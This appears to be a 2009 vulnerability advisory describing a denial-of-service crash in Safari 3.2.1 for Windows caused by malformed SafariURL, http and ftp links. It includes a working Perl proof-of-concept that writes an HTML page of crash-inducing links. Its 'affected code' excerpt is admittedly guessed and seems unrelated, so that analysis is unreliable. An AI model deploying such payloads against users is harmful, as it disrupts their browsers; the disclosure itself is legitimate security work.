Safari 3.2.1 for windows safariUrl protocol Handler abusse(null Deference)
Vendor:http://www.apple.com
original advisore:http://lostmon.blogspot.com/2009/01/
safari-321-for-windows-safariurl.html
vendor notify:YES Exploit available: Private
##############################################
This article is a "second" part of :
http://lostmon.blogspot.com/2009/01/safari-for-windows-321-remote-http-uri.html
Safari for windows in prone vulnerable to a null pointer deference
in protocols handlers http, ftp and SafariURL.
The issue is triggered when a user in click a specially crafted link
with malformed uri that causess a NULL pointer derefence safari,
and will result in loss of availability for the browser.
In the case of SafariURL is very curious, because we can compose
a malformed url like SafariIRL://../ or SafariURL://http://../ or
ftp://../ and wen try to open it whith safari,safari opens a new
windows , and wen we try to close this new one,clicking in the
'X' the window is closed, but it reopens again ...
sO why it opens again in a infinite loop?
Take a look of posible source code of the fucnction.
in any place of the code before using a pointer,
it check that it is not equal to NULL:
######################
Part of code affected
######################
CFURLRef safariURL = nil;
OSStatus err = LSFindApplicationForInfo(kLSUnknownCreator, CFSTR("com.apple.Safari"), nil, nil, &safariURL);if (err != noErr)
displayErrorAndQuit(@"Unable to locate Safari", @"Nightly builds of WebKit require Safari to run. Please check that it is available and then try again.");
NSBundle *safariBundle = [NSBundle bundleWithPath:[(NSURL *)safariURL path]];
CFRelease(safariURL);
return safariBundle; }
###############################
Simple PoC
################################################
# !/usr/bin/perl
# Safari_httpDoSPoc.pl
# Safari for Windows 3.2.1 Remote http: uri handler DoS
# Lostmon [Lostmon@gmail.com ]
#[http://lostmon.blogspot.com]
$archivo = $ARGV[0];
if(!defined($archivo))
{
print "Uso: $0 <archivo.html>\n";
}
$cabecera = "<html><Title> Safari 3.2.1 for windows Browser Die PoC By Lostmon</title>
<body>" . "\n";
$codigo = "<h3>Safari 3.2.1 for windows Browser Die PoC By Lostmon <br>(lostmon@gmail.com) http://lostmon.blogspot.com</h3>
<P>This PoC is a malformed http ,safariurl and ftp URI, this causes that safari for windows<br>
turn inestable and unresponsive.<br>
Click THIS link.=></p><a href=\"SafariURL://http://../\">Safari Die()</a> or this other =><a href=\SafariURL://"http://./\">Safari Die()</a>
<br>
=></p><a href=\"SafariURL://ftp://../\">Safari Die()</a> or this other =><a href=\SafariURL://"ftp://./\">Safari Die()</a>
";
$piepag = "</body></html>";
$datos = $cabecera . $codigo . $piepag;
open(FILE, '>' . $archivo);
print FILE $datos;
close(FILE);
exit;
############################################
I don´t know if it has remote code execution, or other
i make SEVERAL test and only can cause a DoS ,
i don´t know if we can change NSBundle...
this issue with SafariURL can exploit across other browsers.
wen open the link with other browsers it executes safari.exe -url [link]
Thnx To estrella to be my ligth
Thnx to all Lostmon Team.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....